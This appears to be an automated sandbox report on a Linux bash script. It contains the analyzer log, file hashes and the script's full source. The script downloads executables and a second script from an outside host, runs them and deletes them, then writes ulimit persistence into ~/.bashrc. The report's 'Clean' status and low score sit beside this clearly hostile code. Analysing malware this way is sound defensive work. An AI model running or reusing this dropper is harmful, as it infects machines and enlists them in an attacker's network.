Status: Clean
| Category | Package | Started | Completed | Duration | Options | Log(s) | MalScore |
|---|---|---|---|---|---|---|---|
| FILE | bash | 2025-12-08 14:03:24 | 2025-12-08 14:03:53 | 29 seconds | vnc_port=5901 | see analysis log below | 2.5 |
```text
2025-12-08 05:52:09,001 [root] DEBUG: Starting analyzer from: /tmp7_5yn7x6
2025-12-08 05:52:09,001 [root] DEBUG: Storing results at: /tmp/eNwbVgsgtA
2025-12-08 05:52:09,003 [root] DEBUG: Importing auxiliary module "modules.auxiliary.auditd"...
2025-12-08 05:52:09,003 [root] DEBUG: Importing auxiliary module "modules.auxiliary.filecollector"...
2025-12-08 05:52:09,007 [root] DEBUG: Importing auxiliary module "modules.auxiliary.human"...
2025-12-08 05:52:09,007 [root] DEBUG: Importing auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 05:52:09,015 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 05:52:09,019 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 05:52:09,036 [root] DEBUG: Importing auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 05:52:09,036 [root] DEBUG: Importing auxiliary module "modules.auxiliary.tracee"...
2025-12-08 05:52:09,038 [root] DEBUG: Initialized auxiliary module "Auditd"
2025-12-08 05:52:09,038 [root] DEBUG: Trying to start auxiliary module "Auditd"...
2025-12-08 05:52:09,038 [root] DEBUG: Started auxiliary module "Auditd"
2025-12-08 05:52:09,039 [modules.auxiliary.filecollector] INFO: FileCollector run started
2025-12-08 05:52:09,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir sbin
2025-12-08 05:52:09,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir srv
2025-12-08 05:52:09,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir media
2025-12-08 05:52:09,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir libx32
2025-12-08 05:52:09,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp7_5yn7x6
2025-12-08 05:52:09,044 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir etc
2025-12-08 05:52:09,106 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir mnt
2025-12-08 05:52:09,106 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmpij155kl0
2025-12-08 05:52:09,109 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir boot
2025-12-08 05:52:09,112 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir cdrom
2025-12-08 05:52:09,112 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir bin
2025-12-08 05:52:09,112 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir root
2025-12-08 05:52:09,116 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir opt
2025-12-08 05:52:09,117 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir snap
2025-12-08 05:52:09,627 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp
2025-12-08 05:52:09,628 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir home
2025-12-08 05:52:09,641 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lost+found
2025-12-08 05:52:09,642 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lib32
2025-12-08 05:52:09,642 [modules.auxiliary.filecollector] INFO: FileCollector setup complete
2025-12-08 05:52:10,041 [root] DEBUG: Initialized auxiliary module "FileCollector"
2025-12-08 05:52:10,041 [root] DEBUG: Trying to start auxiliary module "FileCollector"...
2025-12-08 05:52:10,041 [root] DEBUG: Started auxiliary module "FileCollector"
2025-12-08 05:52:10,042 [modules.auxiliary.human] DEBUG: Human init complete
2025-12-08 05:52:10,042 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 05:52:10,042 [root] DEBUG: Trying to start auxiliary module "Human"...
2025-12-08 05:52:10,042 [root] DEBUG: Started auxiliary module "Human"
2025-12-08 05:52:10,042 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 05:52:10,042 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2025-12-08 05:52:10,042 [root] DEBUG: Started auxiliary module "Screenshots"
2025-12-08 05:52:10,042 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 05:52:10,042 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2025-12-08 05:52:10,055 [root] DEBUG: Started auxiliary module "Sysmon"
2025-12-08 05:52:10,055 [modules.auxiliary.tracee] INFO: docker start
2025-12-08 05:52:10,055 [root] DEBUG: Initialized auxiliary module "Docker"
2025-12-08 05:52:10,055 [root] DEBUG: Trying to start auxiliary module "Docker"...
2025-12-08 05:52:10,082 [modules.auxiliary.tracee] DEBUG: Starting docker container
2025-12-08 05:52:10,092 [modules.auxiliary.tracee] DEBUG: Attempt to remove Tracee container if it exists.
2025-12-08 05:52:10,093 [modules.auxiliary.tracee] DEBUG: sudo docker run --name tracee -d --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro -v /tmp7_5yn7x6/tracee-artifacts/:/tmp/tracee/out/host -v /var/run:/var/run:ro -v /tmp7_5yn7x6/modules/auxiliary/tracee:/policy aquasec/tracee:latest --output json --output option:parse-arguments,exec-env,exec-hash --policy /policy/policy.yml --cache cache-type=mem --cache mem-cache-size=1024 --capture bpf --capture module --capture write --signatures-dir=/policy/signatures --signatures-dir=./signatures
2025-12-08 05:52:10,300 [modules.auxiliary.tracee] DEBUG: Docker container started: 7f8c9511b7a1aceabe4c1edd50c78852d2b4a4d2c9c41ad0ab698e08989aa606
2025-12-08 05:52:10,302 [lib.common.results] INFO: File /bin/sh-shim size is 125688, Max size: 100000000
2025-12-08 05:52:20,315 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32702 size is 0, Max size: 100000000
2025-12-08 05:52:20,318 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32702 size is 34, Max size: 100000000
2025-12-08 05:52:20,333 [modules.auxiliary.tracee] INFO: Try to stream
2025-12-08 05:52:20,333 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528070>
2025-12-08 05:52:20,334 [modules.auxiliary.tracee] INFO: Streamstart
2025-12-08 05:52:20,334 [root] DEBUG: Started auxiliary module "Docker"
2025-12-08 05:52:20,334 [lib.core.packages] INFO: /bin/bash
2025-12-08 05:52:20,335 [lib.core.packages] INFO: Process will start with strace + sh-shim for Tracee's scope
2025-12-08 05:52:20,335 [lib.core.packages] INFO: sudo strace -v -o /dev/stderr -s 800 -ttf /bin/sh-shim -c "/bin/bash /tmp/0076fe37f41ee52f12cf7.sh"
2025-12-08 05:52:20,336 [lib.core.packages] INFO: Process started
2025-12-08 05:52:20,336 [root] INFO: Added new process to list with pid: 2176
2025-12-08 05:52:20,337 [root] INFO: New child process detected: 2178
2025-12-08 05:52:20,339 [root] ERROR: Could not read memory range 7f07e01b3000-7f07e01c1000: [Errno 5] Input/output error
2025-12-08 05:52:20,340 [root] ERROR: Could not read memory range 7ffe4f79a000-7ffe4f79e000: [Errno 5] Input/output error
2025-12-08 05:52:20,340 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2178.dmp size is 946176, Max size: 100000000
2025-12-08 05:52:20,346 [root] INFO: Added new process to list with pid: 2178
2025-12-08 05:52:20,463 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 77, Max size: 100000000
2025-12-08 05:52:20,468 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 156, Max size: 100000000
2025-12-08 05:52:20,495 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 202, Max size: 100000000
2025-12-08 05:52:20,499 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 277, Max size: 100000000
2025-12-08 05:52:20,589 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 279, Max size: 100000000
2025-12-08 05:52:20,591 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 279, Max size: 100000000
2025-12-08 05:52:20,593 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 284, Max size: 100000000
2025-12-08 05:52:20,594 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 293, Max size: 100000000
2025-12-08 05:52:20,602 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 343, Max size: 100000000
2025-12-08 05:52:20,604 [root] INFO: New child process detected: 2186
2025-12-08 05:52:20,607 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 356, Max size: 100000000
2025-12-08 05:52:20,609 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 357, Max size: 100000000
2025-12-08 05:52:20,623 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 364, Max size: 100000000
2025-12-08 05:52:20,624 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 364, Max size: 100000000
2025-12-08 05:52:20,634 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 397, Max size: 100000000
2025-12-08 05:52:20,640 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 428, Max size: 100000000
2025-12-08 05:52:20,648 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 465, Max size: 100000000
2025-12-08 05:52:20,653 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 489, Max size: 100000000
2025-12-08 05:52:20,660 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 493, Max size: 100000000
2025-12-08 05:52:20,666 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 557, Max size: 100000000
2025-12-08 05:52:20,667 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 557, Max size: 100000000
2025-12-08 05:52:20,670 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 580, Max size: 100000000
2025-12-08 05:52:20,711 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2186.dmp size is 23719936, Max size: 100000000
2025-12-08 05:52:20,820 [root] INFO: Added new process to list with pid: 2186
2025-12-08 05:52:20,821 [root] INFO: New child process detected: 2179
2025-12-08 05:52:20,884 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 662, Max size: 100000000
2025-12-08 05:52:20,889 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 741, Max size: 100000000
2025-12-08 05:52:20,912 [root] ERROR: Could not read memory range 7ffef9ba6000-7ffef9baa000: [Errno 5] Input/output error
2025-12-08 05:52:20,914 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2179.dmp size is 19468288, Max size: 100000000
2025-12-08 05:52:20,915 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 787, Max size: 100000000
2025-12-08 05:52:20,926 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 862, Max size: 100000000
2025-12-08 05:52:21,004 [root] INFO: Added new process to list with pid: 2179
2025-12-08 05:52:21,005 [root] INFO: New child process detected: 2182
2025-12-08 05:52:21,024 [root] ERROR: Could not read memory range 7ffc30db8000-7ffc30dbc000: [Errno 5] Input/output error
2025-12-08 05:52:21,024 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2182.dmp size is 2523136, Max size: 100000000
2025-12-08 05:52:21,039 [root] INFO: Added new process to list with pid: 2182
2025-12-08 05:52:21,039 [root] INFO: New child process detected: 2183
2025-12-08 05:52:21,082 [root] ERROR: Could not read memory range 7fff50d73000-7fff50d77000: [Errno 5] Input/output error
2025-12-08 05:52:21,083 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2183.dmp size is 17321984, Max size: 100000000
2025-12-08 05:52:21,119 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 865, Max size: 100000000
2025-12-08 05:52:21,128 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 870, Max size: 100000000
2025-12-08 05:52:21,138 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 872, Max size: 100000000
2025-12-08 05:52:21,143 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 875, Max size: 100000000
2025-12-08 05:52:21,154 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 880, Max size: 100000000
2025-12-08 05:52:21,160 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 883, Max size: 100000000
2025-12-08 05:52:21,165 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 887, Max size: 100000000
2025-12-08 05:52:21,176 [root] INFO: Added new process to list with pid: 2183
2025-12-08 05:52:21,177 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 897, Max size: 100000000
2025-12-08 05:52:21,182 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 909, Max size: 100000000
2025-12-08 05:52:21,192 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 929, Max size: 100000000
2025-12-08 05:52:21,196 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 936, Max size: 100000000
2025-12-08 05:52:21,202 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 939, Max size: 100000000
2025-12-08 05:52:21,206 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 948, Max size: 100000000
2025-12-08 05:52:21,209 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 954, Max size: 100000000
2025-12-08 05:52:21,212 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 965, Max size: 100000000
2025-12-08 05:52:21,214 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 972, Max size: 100000000
2025-12-08 05:52:21,217 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 982, Max size: 100000000
2025-12-08 05:52:21,219 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 989, Max size: 100000000
2025-12-08 05:52:21,222 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 998, Max size: 100000000
2025-12-08 05:52:21,224 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1010, Max size: 100000000
2025-12-08 05:52:21,226 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1017, Max size: 100000000
2025-12-08 05:52:21,229 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1032, Max size: 100000000
2025-12-08 05:52:21,232 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1043, Max size: 100000000
2025-12-08 05:52:21,234 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1051, Max size: 100000000
2025-12-08 05:52:21,236 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1063, Max size: 100000000
2025-12-08 05:52:21,238 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1069, Max size: 100000000
2025-12-08 05:52:21,240 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1078, Max size: 100000000
2025-12-08 05:52:21,242 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1084, Max size: 100000000
2025-12-08 05:52:21,244 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1090, Max size: 100000000
2025-12-08 05:52:21,246 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1094, Max size: 100000000
2025-12-08 05:52:21,247 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1099, Max size: 100000000
2025-12-08 05:52:21,251 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1100, Max size: 100000000
2025-12-08 05:52:21,253 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1104, Max size: 100000000
2025-12-08 05:52:21,254 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1109, Max size: 100000000
2025-12-08 05:52:21,256 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1116, Max size: 100000000
2025-12-08 05:52:21,258 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1123, Max size: 100000000
2025-12-08 05:52:21,261 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1130, Max size: 100000000
2025-12-08 05:52:21,262 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1135, Max size: 100000000
2025-12-08 05:52:21,264 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1141, Max size: 100000000
2025-12-08 05:52:21,266 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1146, Max size: 100000000
2025-12-08 05:52:21,268 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1153, Max size: 100000000
2025-12-08 05:52:21,270 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1164, Max size: 100000000
2025-12-08 05:52:21,272 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1165, Max size: 100000000
2025-12-08 05:52:21,340 [root] INFO: Process with pid 2186 has terminated
2025-12-08 05:52:21,428 [root] INFO: New child process detected: 2201
2025-12-08 05:52:21,459 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2201.dmp size is 14905344, Max size: 100000000
2025-12-08 05:52:21,517 [root] INFO: Added new process to list with pid: 2201
2025-12-08 05:52:21,637 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1242, Max size: 100000000
2025-12-08 05:52:21,644 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1321, Max size: 100000000
2025-12-08 05:52:21,655 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1442, Max size: 100000000
2025-12-08 05:52:21,710 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1445, Max size: 100000000
2025-12-08 05:52:21,716 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1464, Max size: 100000000
2025-12-08 05:52:21,723 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1490, Max size: 100000000
2025-12-08 05:52:21,729 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1508, Max size: 100000000
2025-12-08 05:52:21,733 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1527, Max size: 100000000
2025-12-08 05:52:21,737 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1542, Max size: 100000000
2025-12-08 05:52:21,741 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1543, Max size: 100000000
2025-12-08 05:52:21,747 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1569, Max size: 100000000
2025-12-08 05:52:21,750 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1580, Max size: 100000000
2025-12-08 05:52:21,761 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1638, Max size: 100000000
2025-12-08 05:52:21,767 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1679, Max size: 100000000
2025-12-08 05:52:21,772 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1719, Max size: 100000000
2025-12-08 05:52:21,777 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1745, Max size: 100000000
2025-12-08 05:52:21,782 [root] INFO: New child process detected: 2212
2025-12-08 05:52:21,832 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32725 size is 1786, Max size: 100000000
2025-12-08 05:52:21,871 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2212.dmp size is 14970880, Max size: 100000000
2025-12-08 05:52:21,955 [root] INFO: Added new process to list with pid: 2212
2025-12-08 05:52:22,013 [lib.common.results] INFO: File /root/.bashrc size is 3443, Max size: 100000000
2025-12-08 05:52:22,017 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-8388611.inode-786435 size is 3443, Max size: 100000000
2025-12-08 05:52:22,020 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-8388611.inode-786435 size is 3652, Max size: 100000000
2025-12-08 05:52:22,022 [lib.common.results] INFO: File /root/.bashrc size is 3652, Max size: 100000000
2025-12-08 05:52:22,341 [root] INFO: Process with pid 2176 has terminated
2025-12-08 05:52:22,342 [root] INFO: Process with pid 2178 has terminated
2025-12-08 05:52:22,342 [root] INFO: Process with pid 2179 has terminated
2025-12-08 05:52:22,342 [root] INFO: Process with pid 2212 has terminated
2025-12-08 05:52:22,342 [root] INFO: Process with pid 2182 has terminated
2025-12-08 05:52:22,342 [root] INFO: Process with pid 2183 has terminated
2025-12-08 05:52:22,342 [root] INFO: Process with pid 2201 has terminated
2025-12-08 05:52:22,342 [root] INFO: Process list is empty, terminating analysis
2025-12-08 05:52:23,337 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528070>
2025-12-08 05:52:23,343 [root] INFO: Stopping auxiliary modules
2025-12-08 05:52:23,343 [root] INFO: Stopping auxiliary module: Auditd
2025-12-08 05:52:23,343 [root] INFO: Stopping auxiliary module: FileCollector
2025-12-08 05:52:23,363 [modules.auxiliary.tracee] INFO: CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 7f8c9511b7a1 aquasec/tracee:latest "/tracee/entrypoint.…" 13 seconds ago Up 13 seconds tracee
2025-12-08 05:52:23,384 [modules.auxiliary.tracee] INFO: sudo tail +1f /var/lib/docker/containers/7f8c9511b7a1aceabe4c1edd50c78852d2b4a4d2c9c41ad0ab698e08989aa606/7f8c9511b7a1aceabe4c1edd50c78852d2b4a4d2c9c41ad0ab698e08989aa606-json.log
2025-12-08 05:52:30,345 [root] INFO: Stopping auxiliary module: Human
2025-12-08 05:52:30,346 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-08 05:52:30,346 [root] INFO: Stopping auxiliary module: Sysmon
2025-12-08 05:52:30,347 [modules.auxiliary.filecollector] INFO: FileCollector run completed
2025-12-08 05:52:30,353 [lib.common.results] INFO: File /tmp/sysmon.data size is 17, Max size: 100000000
2025-12-08 05:52:30,354 [root] INFO: Stopping auxiliary module: Docker
2025-12-08 05:52:30,354 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop
2025-12-08 05:52:30,355 [modules.auxiliary.tracee] DEBUG: Tracee module instructed to stop + was enabled
2025-12-08 05:52:30,355 [modules.auxiliary.tracee] DEBUG: Tracee module skips log collection as it uses streaming
2025-12-08 05:52:32,716 [modules.auxiliary.tracee] DEBUG: Docker container stopped: tracee
2025-12-08 05:52:32,716 [root] INFO: Finishing auxiliary modules
2025-12-08 05:52:32,717 [lib.common.results] WARNING: File /sslkeylog.log doesn't exist anymore
2025-12-08 05:52:32,717 [root] INFO: Analysis completed
```
| Name | Label | Manager | Started On | Shutdown On |
|---|---|---|---|---|
| ubuntu22.04-64bit-1 | ubuntu22.04-64bit-1 | KVM | 2025-12-08 14:03:24 | 2025-12-08 14:03:53 |
| File Name | 0076fe37f41ee52f12cf7.sh |
|---|---|
| File Type | Bourne-Again shell script, ASCII text executable |
| File Size | 3313 bytes |
| MD5 | cf70ee36f1e9247f2146e4981924d4f4 |
| SHA1 | 7eabae4200118c4e89979658db6e4d905fe3dae9 |
| SHA256 | 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c |
| SHA3-384 | 6157430bc8501acb2061335e506fe667ac879772861feb6b636962f63063edfc0737b6cf21438bfe8793e78e9a0da2d6 |
| CRC32 | 95B74DFB |
| TLSH | T14F614899B3DD867548F5F0B21A3E994C222962E2421D5DCDB6EB6CFF244E9C4E3081D3 |
| Ssdeep | 48:7NyNy2INyPyRp7y11tyhycyQAFCp7yr1ty25:7NA+NGeZ28HXAFCZcv |
```bash
#!/bin/bash
cd /tmp; wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0; curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0; chmod +x m3cr0; ./m3cr0; rm -rf m3cr0; rm -rf m3cr0.1
cd /tmp; wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64; curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64; chmod +x zigaarch64; ./zigaarch64; rm -rf zigaarch64; rm -rf zigaarch64.1
cd /tmp; wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x; curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x; chmod +x x00x; ./x00x; rm -rf x00x; rm -rf x00x.1
wget http://floodernetwork111.accesscam.org:8089/bash.sh
curl -O http://floodernetwork111.accesscam.org:8089/bash.sh
bash bash.sh &
rm -rf bash.sh.1
ulimit -u unlimited
ulimit -s unlimited
ulimit -q unlimited
ulimit -n 999999
ulimit -l unlimited
ulimit -i unlimited
ulimit -c unlimited
ulimit -e unlimited
ulimit -r unlimited
echo "ulimit -u unlimited" >> ~/.bashrc
echo "ulimit -s unlimited" >> ~/.bashrc
echo "ulimit -q unlimited" >> ~/.bashrc
echo "ulimit -n 999999" >> ~/.bashrc
echo "ulimit -l unlimited" >> ~/.bashrc
echo "ulimit -i unlimited" >> ~/.bashrc
echo "ulimit -c unlimited" >> ~/.bashrc
echo "ulimit -e unlimited" >> ~/.bashrc
echo "ulimit -r unlimited" >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
echo " " >> ~/.bashrc
